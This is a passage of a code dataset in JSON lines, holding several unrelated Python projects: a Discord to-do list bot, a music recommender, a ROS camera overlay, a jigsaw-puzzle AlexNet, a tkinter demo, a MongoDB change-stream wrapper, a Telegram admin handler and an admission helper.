id_task):\n await self.bot.con.execute(\"UPDATE tasks SET achieved=True WHERE id_task=$1\", id_task)\n\n #update lists stats\n liste_nb_achieved = await self.bot.con.fetchval(\"SELECT nb_achieved FROM listes WHERE id_liste=$1\", id_liste)\n 
await self.bot.con.execute(\"UPDATE listes SET nb_achieved=$1 WHERE id_liste=$2\", liste_nb_achieved+1, id_liste)\n #update users stats\n users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for id_user in set(users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_achieved=$1 WHERE id_user=$2\", user['nb_achieved']+1, id_user[0])\n\n async def create_liste(self, id_user, id_liste, liste, admin, mode, party):\n #insert list in list\n if id_user == admin:\n await self.bot.con.execute(\"INSERT INTO listes (id_liste, nb_tasks, nb_achieved, l_name, admin, mode, party) VALUES ($1,0,0,$2,$3,$4,$5)\",id_liste,liste.lower(), admin, mode, party)\n liste_el = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste) \n #insert liste in main\n await self.bot.con.execute(\"INSERT INTO main (id_user, id_liste, l_name, id_task, t_name) VALUES ($1,$2,$3,NULL,NULL)\",id_user,id_liste,liste.lower())\n\n #upading the user's stats\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", id_user)\n \n if liste_el == None:\n await self.bot.con.execute(\"UPDATE users SET nb_lists=$1 WHERE id_user=$2\", user['nb_lists']+1, id_user)\n return\n await self.bot.con.execute(\"UPDATE users SET nb_lists=$1, nb_tasks=$2, nb_achieved=$3 WHERE id_user=$4\", user['nb_lists']+1, user['nb_tasks']+liste_el['nb_tasks'], user['nb_achieved']+liste_el['nb_achieved'], id_user)\n\n async def add_members(self, author, members, liste, id_liste, mode):\n party = True\n not_added_member = 0\n msg = \"\"\n for member in members:\n l_exists_for_member = await self.check_liste(member.id, liste) #checks if a member already has a list with that name returns the id_liste\n if l_exists_for_member:\n msg = msg + \"Member <@{}> already has a list named {}, she/he hasn't been added to the party\\n\".format(member.id, liste.capitalize())\n not_added_member = not_added_member + 1\n elif not author == member.id:\n await self.check_user(member)\n await self.create_liste(member.id, id_liste, liste.lower(), author, mode, party)\n return (msg, not_added_member)\n\n async def add_task(self, id_user, liste, id_task, task):\n \n #find id_liste to udapte mains and liste table#\n id_liste = await self.bot.con.fetchval(\"SELECT id_liste FROM main WHERE id_user=$1 AND l_name=$2\", id_user, liste)\n await self.bot.con.execute(\"INSERT INTO main (id_user, id_liste, l_name, id_task, t_name) VALUES ($1,$2,$3,$4,$5)\",id_user,id_liste,liste.lower(),id_task,task.lower())\n liste = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"UPDATE listes SET nb_tasks=$1 WHERE id_liste=$2\", liste['nb_tasks']+1, id_liste)\n ####\n\n #Insert task\n await self.bot.con.execute(\"INSERT INTO tasks (id_task, id_liste, t_name, important, urgent, achieved) VALUES ($1,$2,$3,False,False,False)\",id_task,id_liste,task.lower())\n\n #IF PARTY LIST UPDATES ALL USERS\n users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for user in set(users):\n #upading the user's stats\n nb_tasks = await self.bot.con.fetchval(\"SELECT nb_tasks FROM users WHERE id_user=$1\", user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1 WHERE id_user=$2\", nb_tasks+1, user[0])\n\n async def delete_liste(self, ctx, id_liste, id_user, liste):\n admin = await self.bot.con.fetchval(\"SELECT admin FROM listes WHERE 
id_liste=$1\", id_liste)\n if id_user == admin:\n nb_tasks = await self.bot.con.fetchval(\"SELECT nb_tasks FROM listes WHERE id_liste=$1\", id_liste)\n \n #find users_id and upading the users's stats\n id_users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n for all_id_user in set(id_users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", all_id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1, nb_lists=$2 WHERE id_user=$3\", user['nb_tasks']-nb_tasks, user['nb_lists']-1, all_id_user[0])\n\n #del listes and tasks from the other tables\n await self.bot.con.execute(\"DELETE FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM main WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM tasks WHERE id_liste=$1\", id_liste)\n\n await ctx.send(\"{} successfully deleted\".format(liste))\n return\n await ctx.send(\"Only the creator of the liste can delete it.\\n Enter: !leave [liste name] to leave a party liste\")\n\n async def delete_task(self, id_task, id_liste):\n id_users = await self.bot.con.fetch(\"SELECT id_user FROM main WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"DELETE FROM tasks WHERE id_task=$1\", id_task)\n\n #find liste row and upading the liste's stats\n liste_row = await self.bot.con.fetchrow(\"SELECT * FROM listes WHERE id_liste=$1\", id_liste)\n await self.bot.con.execute(\"UPDATE listes SET nb_tasks=$1 WHERE id_liste=$2\", liste_row['nb_tasks']-1, id_liste)\n\n #find user row and upading the user's stats\n for all_id_user in set(id_users):\n user = await self.bot.con.fetchrow(\"SELECT * FROM users WHERE id_user=$1\", all_id_user[0])\n await self.bot.con.execute(\"UPDATE users SET nb_tasks=$1 WHERE id_user=$2\", user['nb_tasks']-1, all_id_user[0])\n\n\n if liste_row['nb_tasks'] <= 1:\n await self.bot.con.execute(\"UPDATE main SET id_task=NULL, t_name=NULL WHERE id_liste=$1\",id_liste)\n return\n\n await self.bot.con.execute(\"DELETE FROM main WHERE id_task=$1\", id_task)\n\n async def welcome(self, user, author):\n #if not in database yet send a Welcome msg\n if not user:\n await author.send(\"Hi it is just to tell you that you can use the BOT per DM if you want to manage your to do lists in a more cozy place ;)\")\n embed = discord.Embed(\n title=\"Shall you have a nice and productive day !\",\n color=random.randint(0, 0xffffff)\n )\n embed.set_image(url=\"https://media1.tenor.com/images/c9e7b31aad80f5dea1eaf363d2c0814d/tenor.gif?itemid=19979337\")\n await author.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(ModificationCommands(bot))","repo_name":"OtmaniKhaoula/ToDoCat","sub_path":"Cogs/ModificationCommands.py","file_name":"ModificationCommands.py","file_ext":"py","file_size_in_byte":16611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25471078697","text":"import copy\nimport os\n\nimport sys\nimport json\n\nfrom db_accessing.VO import Album_VO\nfrom modules.natural_language.NL import NL_processor\nfrom modules.recommendation.similarity_functions import cosine_similarity\n\ndef make_user_interest_vector(user_interests, sample_dict):\n # unique_interests[i] 가 관심사 리스트에 존재한다면 i 번째 요소가 1이고, 존재하지 않으면 0인 벡터를 생성\n return [1 if interest in user_interests else 0\n for interest in sample_dict]\n\n# for i in range(1, lenOfNotNULL, batchsize):\n# for offs in range(1, 10, batchsize):\n\ndir = '__recommand__'\nif not os.path.exists(dir):\n 
os.mkdir(dir)\n\nlenOfNotNULL = Album_VO.query.filter(Album_VO.Description != None).count()\nprint(lenOfNotNULL, type(lenOfNotNULL))\n\nbatchsize = 200\nrecommend_size = 3\ndef recommended_list_to_json(rec_list):\n    fname = '{0}/recommand_album_{1}.json'.format(dir, x[res_i].Album_ID)\n    with open(fname, mode='w', encoding='utf8') as f:\n        for dict_input in rec_list:\n            json.dump(dict_input,fp=f, ensure_ascii=False)\n            f.write('\\n')\n\n\nx = Album_VO.query.filter(Album_VO.Description != None).offset(210).limit(batchsize).all()\nfor seg in x:\n    print(seg.Album_Title)\n# print(len(x), type(x))\n\nsim_best3 = []\nfor i in range(batchsize):\n    print('outerloop count: ', i)\n    NLP_noun_count_dict = NL_processor(x[i].Description).noun_count_result\n    ht_list = list(NLP_noun_count_dict.keys())\n    inner_sim_best3 = []\n    for j in range(batchsize):\n\n        if i != j:\n            inner_ht_list = list(NL_processor(x[j].Description).noun_count_result.keys())\n\n            dictionary_set = copy.deepcopy(ht_list)\n            dictionary_set.extend(inner_ht_list)\n            dictionary_set = list(set(dictionary_set))\n\n            # print(\"dict_set : \", dictionary_set)\n\n\n            IR_Vector_inner = make_user_interest_vector(inner_ht_list, dictionary_set)\n            IR_Vector_outer = make_user_interest_vector(ht_list, dictionary_set)\n            # print(IR_Vector_inner)\n            # print(IR_Vector_outer)\n            sim = cosine_similarity(IR_Vector_inner, IR_Vector_outer)\n            # print(sim)\n\n            if len(inner_sim_best3) == recommend_size:\n                # print('if branch', file=sys.stderr)\n                for k in range(recommend_size):\n                    if inner_sim_best3[k][0] < sim:\n                        inner_sim_best3[k] = [sim, x[j]]\n                        inner_sim_best3.sort(key = lambda element : element[0])\n                        break\n                # print(inner_sim_best3)\n            else:\n                # print('else branch', file=sys.stderr)\n                inner_sim_best3.append([sim, x[j]])\n                inner_sim_best3.sort(key = lambda element : element[0])\n                # print(inner_sim_best3)\n\n    sim_best3.append(inner_sim_best3)\n    # print(inner_sim_best3, file=sys.stderr)\n\nfor res_i in range(batchsize):\n    print(x[res_i].Album_Title, \"'s recommended Album is : \\n\\t\")\n    rec_list = []\n    for i in range(len(sim_best3[res_i])):\n        print(\">>> [{0}] {1} : {2} \\n\\t\".format(sim_best3[res_i][i][0], sim_best3[res_i][i][1].Album_ID, sim_best3[res_i][i][1].Album_Title), file=sys.stderr)\n        dict_result = {\"ID\": sim_best3[res_i][i][1].Album_ID, \"Title\": sim_best3[res_i][i][1].Album_Title,\"similarity\": sim_best3[res_i][i][0]}\n        rec_list.append(dict_result)\n    recommended_list_to_json(rec_list)\n\n\n\n\n\n# print('batch : {0}'.format(i/batchsize))\n\n# mat = []\n# for i in range(len(x)):\n#     mat.append(NL_processor(x[i].Description).all_count_result)\n#     print(mat[i])\n#\n# print()","repo_name":"bitacademy-howl/Music_Recommendation_mod","sub_path":"test_module/data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1019947101","text":"#!/usr/bin/env python\nimport roslib\nimport sys\nimport rospy\nimport cv2\nimport numpy as np\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image, Joy\nfrom cv_bridge import CvBridge, CvBridgeError\nimport time\n\n\nclass image_converter:\n\n    def __init__(self):\n        self.image_pub = rospy.Publisher(\"image_overlay\",Image, queue_size=1)\n\n        self.bridge = CvBridge()\n        self.image_sub = rospy.Subscriber(\"/stereo/left/image_raw\",Image,self.callback)\n        self.twistJoystickForce = None\n        self.twistJoystickTorque = None\n        trans_sub = rospy.Subscriber(\"/translate/joy\", Joy, self.translateCb)\n        rot_sub = 
rospy.subscribe(\"/rotate/joy\", Joy, self.rotateCb);\n\n\n def translateCb(self,msg):\n twistMsg.force.x = msg.axes[1] * 20\n twistMsg.force.y = msg.axes[0] * 20\n twistMsg.force.z = msg.axes[2] * 20\n twistJoystickForce = [twistMsg.force.x,twistMsg.y,twistMsg.z] \n\n def rotateCb(self, msg):\n twistMsg.torque.x = msg.axes[0] * -2\n twistMsg.torque.y = msg.axes[1] * 2\n twistMsg.torque.z = msg.axes[2] * 2\n twistJoystickTorque = [twistMsg.torque.x,twistMsg.torque.y,twistMsg.torque.z]\n\n def callback(self,data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n text = str(time.time())\n \n pts = np.array([[50,430],[50,380],[100,430],[100,380]], np.int32)\n pts = pts.reshape((-1,1,2))\n cv2.polylines(img, [pts], True, (0,255,255))\n cv2.line(img, [75,405], [twistJoystickForce.x, TwistJoystickForce.y], (255,255,255))\n\n pts = np.array([[590,430],[590,380],[540,430],[540,380]], np.int32)\n pts = pts.reshape((-1,1,2))\n cv2.polylines(img, [pts], True, (0,255,255))\n cv2.line(img, [565,405], [twistJoystickTorque.x, twistJoystickTorque.y], (255,255,255))\n\n cv2.putText(img,text,(10,100), font, 4,(255,255,255),2,cv2.LINE_AA)\n\n filename = text + \".png\"\n cv2.imwrite(filename,img)\n\n try:\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n \ndef main(args):\n ic = image_converter()\n rospy.init_node('image_converter', anonymous=True)\n try:\n rospy.spin()\n\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"RoboticsClubatUCF/RoboSub","sub_path":"ucf_sub_catkin_ros/src/sub_utils/src/sub_image_overlay.py","file_name":"sub_image_overlay.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71265917929","text":"import torch.nn as nn\nimport torch\nfrom torchvision.models import alexnet as alex, AlexNet\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n Custom AlexNet like Unsupervised learning paper\n \"\"\"\n\n def __init__(self, input_channels: int=1, n_output_payer=100):\n super(AlexNet, self).__init__()\n self.num_tiles = 9\n # Alext net input dim 256×256x3\n self.features = nn.Sequential(\n nn.Conv2d(input_channels, 96, kernel_size=11, stride=2, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(96, 256, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(256, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Flatten()\n )\n\n # intermediate feature representation F\n self.flatten_feats = nn.Sequential(\n nn.Linear(1024, 512),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Flatten(0), # concat simulation (9, 512) -> (1, 4608)\n )\n\n # Concatenated nineth networks\n self.clasif_concatenated = nn.Sequential(\n nn.Linear(512 * 9, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, n_output_payer))\n\n\nclass JigsawNetAlex(AlexNet):\n \"\"\"\n Unsupervised learning solving Jigsaw puzzle\n Paper implementation using Alexnet\n \"\"\"\n\n def __init__(self, num_tiles):\n \"\"\"\n\n Args:\n num_tiles:\n num_perm:\n \"\"\"\n super().__init__()\n self.tiles = 
num_tiles\n\n\n    def forward(self, x):\n        \"\"\"\n\n        Args:\n            x: tensor of tiles with shape (B, tiles, C, W, H)\n\n        Returns:\n            logits over the permutation indices, shape (B, 100)\n        \"\"\"\n        con = []\n        for batch in range(0, x.shape[0]):\n\n            # get (9, 1024)\n            tile = self.features(x[batch, :, :, :, :])\n\n            # return (9, 512)\n            con.append(self.flatten_feats(tile))\n\n        y = torch.vstack(con)\n        y = self.clasif_concatenated(y)\n        return y\n\n\ndef jigsawnet_alexnet(tiles=9, pretrained=False) -> torch.nn.Module:\n    if pretrained:\n        print(\"Not Implemented\")\n        return None\n    else:\n        return JigsawNetAlex(num_tiles=tiles)\n","repo_name":"Karimx/unsuperviced_learning_Jigsaw","sub_path":"jigsawnet.py","file_name":"jigsawnet.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34422962986","text":"from tkinter import Tk, Label, Canvas, Button, PhotoImage\n\ntela = Tk()\n\ntela.geometry(\"900x500\")\ntela.title(\"Canvas Drawing\")\n\ntitulo = Label(tela, text=\"Drawing with Python\", font=\"Arial 32\", fg=\"#333333\")\ncanvas = Canvas(tela, bg=\"#888888\")\n\ndef mover():\n    canvas.move(retangulo, 5, 5) # relative move (down and right)\n    #canvas.moveto(circulo, 60, 100) # absolute move\n    print(\"Moving...\")\n\ndef aumentar():\n    canvas.coords(retangulo, 10, 10, 100, 200)\n    print(\"Enlarging...\")\n\ndef diminuir():\n    canvas.coords(retangulo, 10, 10, 100, 100)\n    print(\"Shrinking...\")\n\nimg = PhotoImage(file=\"imagens/PUC.png\")\nlogoPUC = canvas.create_image(120, 120, image=img)\ncirculo = canvas.create_oval(60, 60, 150, 150, fill=\"red\")\nretangulo = canvas.create_rectangle(10, 10, 100, 100, outline=\"black\", fill=\"blue\")\nbotao = Button(tela, text=\"Move\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=mover)\nbotao2 = Button(tela, text=\"Enlarge\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=aumentar)\nbotao3 = Button(tela, text=\"Shrink\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=diminuir)\n\ntitulo.pack()\ncanvas.pack()\nbotao.pack()\nbotao2.pack()\nbotao3.pack()\n\ntela.mainloop()","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14583551179","text":"\"\"\"\nwatch.py\n\nManages the watch cursor.\n\"\"\"\n\n\nimport time\nimport typing\n\nimport pymongo.change_stream\nimport pymongo.collection\nimport pymongo.database\nimport pymongo.mongo_client\n\nOperationType = typing.Literal[\"insert\", \"update\", \"delete\", \"replace\", \"drop\", \"rename\", \"dropDatabase\", \"invalidate\"]\n\n\nclass Operation():\n    \"\"\"\n    An enum for the different events that can occur on MongoDB\n\n    Example\n    -------\n    >>> from yuno.direction import Operation\n    >>> Operation.INSERT\n    'insert'\n    \"\"\"\n    UPDATE: OperationType = \"update\"\n    INSERT: OperationType = \"insert\"\n    DELETE: OperationType = \"delete\"\n    REPLACE: OperationType = \"replace\"\n    DROP: OperationType = \"drop\"\n    RENAME: OperationType = \"rename\"\n    DROP_DATABASE: OperationType = \"dropDatabase\"\n    INVALIDATE: OperationType = \"invalidate\"\n\n\nclass WatchEvent():\n    \"\"\"\n    An object representing an event on MongoDB.\n    \"\"\"\n    class Namespace:\n        \"\"\"\n        The namespace the event occurred in\n        \"\"\"\n\n        def __init__(self, data: dict) -> None:\n            self.database = data.get(\"db\")\n            
self.collection = data.get(\"coll\")\n\n def __getitem__(self, key: str) -> str:\n return self.__getattribute__(key)\n\n class LSID:\n \"\"\"\n The id of the event\n \"\"\"\n\n def __init__(self, data: dict) -> None:\n self.id = data.get(\"id\", None)\n self.uid = data.get(\"uid\", None)\n\n def __init__(self, data: dict) -> None:\n \"\"\"Initialize the object with raw event data\"\"\"\n self.id = self._id = data.get(\"_id\")\n self.operation: OperationType = data.get(\"operationType\")\n self.document = data.get(\"fullDocument\", None)\n self.namespace = self.Namespace(data.get(\"ns\", {}))\n self.timestamp = data.get(\"clusterTime\", None)\n self.transaction = data.get(\"txnNumber\", None)\n self.session_id = self.LSID(data.get(\"lsid\", {}))\n\n\nclass CRUDEvent(WatchEvent):\n class DocumentKey:\n def __init__(self, data: dict) -> None:\n self.id = self._id = data.get(\"_id\")\n self.__data__ = dict(data)\n\n def __getattribute__(self, name: str):\n if name in (\"__data__\", \"__getitem__\", \"__getattribute__\"):\n return super().__getattribute__(name)\n return self.__getitem__(name)\n\n def __getitem__(self, name: str):\n return self.data[name]\n\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.document_key = self.DocumentKey(data.get(\"documentKey\", {})) # insert, replace, delete, update\n\n\nclass UpdateEvent(CRUDEvent):\n class Description:\n class Truncated:\n def __init__(self, data: dict) -> None:\n self.field = data.get(\"field\", None)\n self.new_size = data.get(\"newSize\", None)\n\n def __init__(self, data: dict) -> None:\n self.updated_fields: typing.Dict[str, typing.Any] = data.get(\"updatedFields\", {})\n self.removed_fields: typing.List[str] = data.get(\"removedFields\", [])\n self.truncated_arrays = [self.Truncated(e) for e in data.get(\"truncatedArrays\", [])]\n\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.update_description = self.Description(data.get(\"updateDescription\", {}))\n\n\nclass InsertEvent(CRUDEvent):\n pass\n\n\nclass DeleteEvent(CRUDEvent):\n pass\n\n\nclass ReplaceEvent(CRUDEvent):\n pass\n\n\nclass DropEvent(WatchEvent):\n pass\n\n\nclass RenameEvent(WatchEvent):\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.to = self.Namespace(data.get(\"to\", {})) # rename\n\n\nclass DropDatabaseEvent(WatchEvent):\n pass\n\n\nclass InvalidateEvent(WatchEvent):\n pass\n\n\nclass Watch():\n \"\"\"\n A db.watch(), db.collection.watch(), db.collection.object.watch() stream to get the different events.\n \"\"\"\n __stream__: pymongo.change_stream.ChangeStream\n __watching_object__: pymongo.collection.Collection\n __state__: dict = {\n \"token\": None, # the resume token\n \"time\": 0, # time of the last error\n \"count\": 0 # number of errors in the period\n }\n\n # pipeline=pipeline, full_document=None, resume_after=resume_state[\"token\"], max_await_time_ms=None,\n # batch_size=None, collation=None, start_at_operation_time=None, session=None, start_after=None\n\n def __init__(self, watching_object: typing.Union[pymongo.collection.Collection, pymongo.database.Database, pymongo.mongo_client.MongoClient], pipeline: typing.List[dict] = None, full_document: typing.Union[str, bool] = False, error_limit: int = 3, error_expiration: float = 60, **kwargs) -> None:\n \"\"\"\n Initializes the stream.\n\n Parameters\n ----------\n watching_object: pymongo.collection.Collection, pymongo.database.Database, pymongo.mongo_client.MongoClient\n The object to watch.\n pipeline: list[dict]\n The pipeline to 
use.\n full_document: bool, str\n To return the full document when the event is an UpdateEvent.\n error_limit: int\n The number of errors before the stream is closed.\n error_expiration: float\n The number of seconds before the error count is reset.\n kwargs:\n The arguments to pass to the stream.\n \"\"\"\n if isinstance(full_document, bool):\n full_document = \"updateLookup\" if full_document else None\n self.pipeline = pipeline\n self.full_document = full_document\n self.kwargs = kwargs\n\n self.error_limit = int(error_limit)\n self.error_expiration = float(error_expiration)\n\n self.__watching_object__ = watching_object\n self.__stream__ = watching_object.watch(pipeline, full_document, **kwargs)\n self.__closed__ = False\n\n def __next__(self): # alias\n \"\"\"\n Get the next event (blocking operation)\n\n Returns\n -------\n WatchEvent\n The next event to occur on the object.\n\n Example\n -------\n >>> document = db.collection.document\n >>> watch_obj = document.watch()\n >>> for event in watch_obj:\n >>> print(event) # only called when an event occurs on the database\n \"\"\"\n return self.next()\n\n def _get_right_event(self, data: dict) -> WatchEvent:\n \"\"\"\n An internal function to get the right event type from raw event data.\n\n Parameters\n ----------\n data: dict\n The raw event data.\n\n Returns\n -------\n WatchEvent\n The event.\n \"\"\"\n operation = data.get(\"operationType\", None)\n if operation == Operation.UPDATE:\n return UpdateEvent(data)\n elif operation == Operation.INSERT:\n return InsertEvent(data)\n elif operation == Operation.DELETE:\n return DeleteEvent(data)\n elif operation == Operation.REPLACE:\n return ReplaceEvent(data)\n elif operation == Operation.DROP:\n return DropEvent(data)\n elif operation == Operation.RENAME:\n return RenameEvent(data)\n elif operation == Operation.DROP_DATABASE:\n return DropDatabaseEvent(data)\n elif operation == Operation.INVALIDATE:\n return InvalidateEvent(data)\n return WatchEvent(data)\n\n def next(self) -> WatchEvent:\n \"\"\"\n Get the next event (blocking operation)\n\n Returns\n -------\n WatchEvent\n The next event to occur on the object.\n\n Example\n -------\n >>> document = db.collection.document\n >>> watch_obj = document.watch()\n >>> for event in watch_obj:\n >>> print(event) # only called when an event occurs on the database\n \"\"\"\n if self.__closed__:\n raise StopIteration(\"Stream is closed\")\n try:\n data = self.__stream__.next()\n self.__state__[\"token\"] = self.resume_token\n except Exception as err:\n self.__state__[\"count\"] += 1\n if time.time() - self.__state__[\"time\"] > self.error_expiration:\n self.__state__[\"time\"] = time.time()\n self.__state__[\"count\"] = 1\n else:\n self.__state__[\"time\"] = time.time()\n if self.__state__[\"count\"] >= self.error_limit:\n try:\n self.__stream__.close()\n except Exception:\n pass\n raise ValueError(\"More than {} errors have occured in {} seconds while watching for changes in {}\".format(\n self.error_limit, self.error_expiration, self.__watching_object__)) from err\n self.kwargs[\"resume_after\"] = self.__state__[\"token\"]\n self.__stream__ = self.__watching_object__.watch(self.pipeline, self.full_document, **self.kwargs)\n return self.__next__()\n\n return self._get_right_event(data)\n\n def try_next(self) -> typing.Any:\n \"\"\"\n Try to get the next event without raising an exception and without waiting.\n\n Returns\n -------\n WatchEvent\n \"\"\"\n try:\n data = self.__stream__.try_next()\n if data is not None:\n return 
self._get_right_event(data)\n            return data\n        except StopIteration:\n            return None\n\n    def close(self):\n        \"\"\"Closes the stream.\"\"\"\n        self.__closed__ = True\n        self.__stream__.close()\n\n    def resume(self):\n        \"\"\"Resume the stream from the last known state.\"\"\"\n        self.kwargs[\"resume_after\"] = self.__state__[\"token\"]\n        self.__stream__ = self.__watching_object__.watch(self.pipeline, self.full_document, **self.kwargs)\n        self.__closed__ = False\n\n    @property\n    def resume_token(self):\n        \"\"\"Get the resume token, which is used to resume the stream if it failed.\"\"\"\n        return self.__stream__.resume_token\n\n    @property\n    def alive(self):\n        \"\"\"\n        Get whether the stream is alive.\n\n        Returns\n        -------\n        bool\n            Whether the stream is alive.\n        \"\"\"\n        return self.__stream__.alive  # the underlying ChangeStream exposes .alive\n\n    def __enter__(self):\n        \"\"\"\n        Enter the context manager.\n\n        Example\n        -------\n        >>> with db.watch() as stream: # <-- this line calls __enter__\n        ...     for event in stream:\n        ...         print(event)\n        \"\"\"\n        return self\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        \"\"\"\n        Exit the context manager.\n\n        Example\n        -------\n        >>> with db.watch() as stream:\n        ...     for event in stream:\n        ...         print(event)\n        ... # <-- this line calls __exit__\n        \"\"\"\n        self.close()\n\n    def __iter__(self) -> typing.Iterator[WatchEvent]:\n        \"\"\"\n        Returns the iterator.\n        \"\"\"\n        return self\n","repo_name":"Animenosekai/yuno","sub_path":"yuno/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":10963,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"30836410133","text":"from typing import TYPE_CHECKING\n\nfrom aiogram import Router, types, F\nfrom fluentogram import TranslatorRunner\n\nfrom src.application.admin.interfaces.uow import IAdminUoW\nfrom src.application.admin.usecases.admin import GetAdmin\nfrom src.bot.constants import MISS\nfrom src.bot.keyboards.root.admins.callback_data import (\n    AdminCallbackData,\n    AdminAction,\n)\nfrom src.bot.keyboards.root.admins.info import get_admin_info_markup\n\nif TYPE_CHECKING:\n    from src.infrastructure.localization.translator import TranslatorRunner\n\nrouter = Router()\n\n\n@router.callback_query(AdminCallbackData.filter(F.action == AdminAction.INFO))\nasync def on_admin_info(\n    c: types.CallbackQuery,\n    callback_data: AdminCallbackData,\n    base_url: str,\n    ftl: TranslatorRunner,\n    uow: IAdminUoW,\n):\n    admin = await GetAdmin(uow)(callback_data.admin_id)\n    text = ftl.root.profile.registry.admin.info(\n        surname=admin.surname,\n        name=admin.name,\n        patronymic=admin.patronymic or MISS,\n        phone=f\"+{admin.user.phone}\" if admin.user.phone else MISS,\n        email=admin.user.email,\n        telegram_id=str(admin.user.telegram_id) if admin.user.telegram_id else MISS,\n        username=admin.user.telegram_username or MISS,\n        birthday=admin.birthday,\n        level=admin.level or MISS,\n        description=admin.description or MISS,\n        access_start=admin.access_start,\n        access_end=admin.access_end,\n        timezone=admin.user.timezone,\n    )\n    markup = get_admin_info_markup(ftl, callback_data.admin_id, base_url)\n    await c.message.edit_text(text, reply_markup=markup)\n    await c.answer()\n","repo_name":"shalmeo/xingfu","sub_path":"src/bot/handlers/root/admins/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43446874584","text":"import random\nfrom subject_misc import programme_max_quota, prioritization\nfrom oleveldata import 
StudentOlevelRecord\n\nclass OfferedProgramme(StudentOlevelRecord):\n    '''This class looks up the appropriate programme for a qualifying candidate;\n    it either recommends the original programme or an alternative\n    '''\n    def __init__(self,*args):\n        ''' admi_status Boolean, student_ranking position, carrying capacity of\n        the programme\n        '''\n        super().__init__(args[0])\n        self.adm_status = args[1]\n        self.student_ranking = args[2]\n        self.programme_quota = args[3]\n        self.return_offered_programme()\n    \n    def getalterProgramme(self, *args):\n        # This function uses the priority key to get the list of all alternative programmes\n        available_programme = []\n        priorityKey = None\n        for key, value in args[0].items():\n            if key.lower() != self.Programme.lower():continue\n            else:\n                priorityKey = value\n        \n        for key, value in args[0].items():\n            if value >= priorityKey:continue\n            else:\n                available_programme.append(key)\n        return available_programme\n\n\n\n    def getStatus(self, *args):\n        if args[0] == True and args[1] <= args[2]:\n            return True\n        else:\n            return False\n\n    def return_offered_programme(self):\n        # Return the original programme or a recommended alternative\n        status = self.getStatus(self.adm_status, self.student_ranking, self.programme_quota)\n        if status:\n            return self.Programme\n        else:\n            list_prog = self.getalterProgramme(prioritization)\n            recom_programme = self.getrandomElement(list_prog)\n            return recom_programme\n    \n\n    def getrandomElement(self, elements):\n        # Pick a random alternative programme; should eventually recommend a programme based on rules\n        # random.choice avoids the off-by-one bias of randint(0, len(elements))\n        return random.choice(elements)\n    \n","repo_name":"blueband/nigerian_university_admission_data","sub_path":"selection_criteria.py","file_name":"selection_criteria.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5698524224","text":"import sys\nimport json # json is a built-in module, but we still need to import it\nimport 